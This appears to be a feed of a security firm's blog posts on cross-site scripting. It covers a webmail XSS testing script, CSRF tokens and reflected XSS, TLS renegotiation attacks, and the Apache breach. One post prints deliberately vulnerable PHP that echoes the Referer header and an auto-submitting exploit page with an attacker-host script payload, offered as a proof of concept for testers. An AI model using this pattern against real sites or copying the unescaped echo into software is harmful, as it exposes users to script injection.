xss https://www.gremwell.com/ en Webmail XSS Tester - Excess2 https://www.gremwell.com/excess2_webmail_xss_tester <span>Webmail XSS Tester - Excess2</span> <div><p>Here is a <a href="http://www.gremwell.com/sites/default/files/excess2.pl_">script to automate testing of webmail systems for cross-site scripting</a>. It uses <a href="http://ha.ckers.org/xss.html">XSS Cheat Sheet</a> to generate the injection strings. Compared to the <a href="http://www.scanit.be/en_US/excess.html">previous version</a> this version downloads XSS cheat sheet on the fly (instead of having it hard-coded) and supports SMTP authentication.</p> <pre> NAME excess2 - A script for testing webmail systems for cross-site scripting problems DESCRIPTION This script sends a number of HTML-formatted email messages to a specified email address. In order to test a webmail system you need to have an email account on the system, run this script to send messages to that account, and then view the received messages through the webmail interface. If you get a popup box saying "XSS!" it means that your webmail system failed to block the attack. Try viewing the messages in several different browsers, including Internet Explorer and Mozilla Firefox. Some attacks work in one browser, but don't work in another. The script downloads RSnake's XSS Cheat sheet from http://ha.ckers.org/xssAttacks.xml. This way we always have the latest and greatest XSS attacks. Thanks, RSnake. OPTIONS -t you@webmail.example.com The destination email address -f return-address@example.com From email address. Replies and rejects will go to that address. -s mymailserver.example.com SMTP server to use for sending messages. -u SMTP server username (if it requires authentication) -p SMTP server password (if it requires authentication) </pre><p> <a href="http://www.gremwell.com/sites/default/files/excess2.pl_">Download here</a></p> </div> <span><span lang="" about="/user/10" typeof="schema:Person" property="schema:name" datatype="">alla</span></span> <span>Wed, 01/12/2011 - 21:57</span> Wed, 12 Jan 2011 20:57:29 +0000 alla 81 at https://www.gremwell.com Exploiting cross-site scripting in Referer header https://www.gremwell.com/exploiting_xss_in_referer_header <span>Exploiting cross-site scripting in Referer header</span> <div><p>The application that echoes the Referer header is vulnerable to cross-site scripting. And it is perfectly exploitable. Here is how:</p> <!--break--><p>Suppose we have an application that generates a "Back" link from Referer header (let's call it vulnerable.php):</p> <pre> &lt;?php echo '&lt;a href="'; echo $_SERVER['HTTP_REFERER']; echo '"&gt;Back&lt;/a&gt;\n'; ?&gt; </pre><p> We can inject HTML and JavaScript if we can set the Referer header. This can be done if we first get the victim to visit a page created by the attacker. Consider the following page (let's call it exploit.html):</p> <pre> &lt;html&gt; &lt;body&gt; &lt;form id="xss" name="xss" method="GET" action="http://victim.example.com/vulnerable.php"&gt; &lt;/form&gt; &lt;script&gt; document.getElementById("xss").submit(); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; </pre><p> If the victim is tricked into visiting <a href="http://attacker.example.com/exploit.html?&lt;script&gt;alert(1);&lt;/script&amp;gt">http://attacker.example.com/exploit.html?&lt;script&gt;alert(1);&lt;/script&amp;gt</a>; he will end up on the vulnerable page with the Referer header containing XSS attack. </p> <p>This attack works in Internet Explorer, but does not work in Firefox, because Firefox will URL-encode the naughty characters after the question mark. It may still be possible to exploit this with Firefox, but some trickery with mod_rewrite will be needed to have XSS data in the path, instead of in the query.</p> </div> <span><span lang="" about="/user/10" typeof="schema:Person" property="schema:name" datatype="">alla</span></span> <span>Thu, 10/21/2010 - 16:04</span> Thu, 21 Oct 2010 14:04:31 +0000 alla 64 at https://www.gremwell.com CSRF protection also fixes reflected XSS https://www.gremwell.com/csrf_protection_fixes_reflected_xss <span>CSRF protection also fixes reflected XSS</span> <div><p>An application I have recently tested had cross-site request forgery protection implemented throughout - every single form or link with parameters had an additional parameter with a value derived from the session id. When the form is submitted or the link is clicked, before any other processing, this parameter value is checked. </p> <p>And guess what - that also makes all reflected cross-site scripting bugs not exploitable. How? </p> <p>To exploit reflected XSS the attacker needs to get the user to submit a request to the application that will result in application echoing back the JavaScript code passed by the attacker in one of the request parameters. But, to craft that request the attacker needs to supply a valid anti-CSRF parameter value, which he can not know. If the anti-CSRF parameter is not there, or the value is not right, the user gets an error, not the normal page, that should have contained the attacker's code. So, XSS exploit fails.</p> </div> <span><span lang="" about="/user/10" typeof="schema:Person" property="schema:name" datatype="">alla</span></span> <span>Fri, 09/24/2010 - 09:08</span> Fri, 24 Sep 2010 07:08:29 +0000 alla 61 at https://www.gremwell.com Impact of TLS/SSL Renegotiation Vulnerability on HTTPS: Less Known Issues https://www.gremwell.com/ssl_tls_renegotiation_less_known_issues <span>Impact of TLS/SSL Renegotiation Vulnerability on HTTPS: Less Known Issues</span> <div><p>There is a couple of issues with TLS/SSL renegotiation vulnerability in the context of HTTPS protocol, which appear not to have made their way to the public.</p> <p> 1. Plain text prefix injection is not the only risk. The original advisory [1] mentions the possibility of "forwarding and repurposing of client certificate authentication credentials". In oss-sec maillist Marsh Ray goes in more details [2], and [3] dedicates one slide to "client certificate redirection".</p> <p> 2. The renegotiation vulnerability provides for an additional attack vector to exploit web application vulnerabilities. For example, MiTM attackers can use it to deliver an exploit for a non-persistent XSS bug to client's browser.</p> <p>References:</p> <p> [1] <a href="http://www.phonefactor.com/sslgapdocs/Renegotiating_TLS.pdf">http://www.phonefactor.com/sslgapdocs/Renegotiating_TLS.pdf</a><br /> [2] <a href="http://seclists.org/oss-sec/2009/q4/137">http://seclists.org/oss-sec/2009/q4/137</a><br /> [3] <a href="http://www.troopers10.org/content/e728/e897/e903/TROOPERS10_History_of_the_TLS_Auth_Gap_Bug_Dispensa_Ray.pdf">http://www.troopers10.org/content/e728/e897/e903/TROOPERS10_History_of_…</a></p> </div> <span><span lang="" about="/user/1" typeof="schema:Person" property="schema:name" datatype="">abb</span></span> <span>Sun, 09/12/2010 - 13:10</span> Sun, 12 Sep 2010 11:10:31 +0000 abb 56 at https://www.gremwell.com Apache Foundation Hacked via Reflected Cross-Site Scripting https://www.gremwell.com/apache_foundation_hacked_via_reflected_xss <span>Apache Foundation Hacked via Reflected Cross-Site Scripting</span> <div><p>I am thoroughly impressed. A combination of reflected XSS, insecure file uploads and bad passwords allowed the attackers to gain root on one of the Apache Foundation's servers, and gain non-privileged shell on another one. Here is the story <a href="https://blogs.apache.org/infra/entry/apache_org_04_09_2010">directly from Apache</a>.</p> <p>In my opinion the most interesting part here is the fact that reflected XSS was used as the initial step. I always thought XSS, particularly the reflected sort, is somewhat over-hyped. I don't think so any more.</p> </div> <span><span lang="" about="/user/10" typeof="schema:Person" property="schema:name" datatype="">alla</span></span> <span>Mon, 04/19/2010 - 18:49</span> Mon, 19 Apr 2010 16:49:10 +0000 alla 43 at https://www.gremwell.com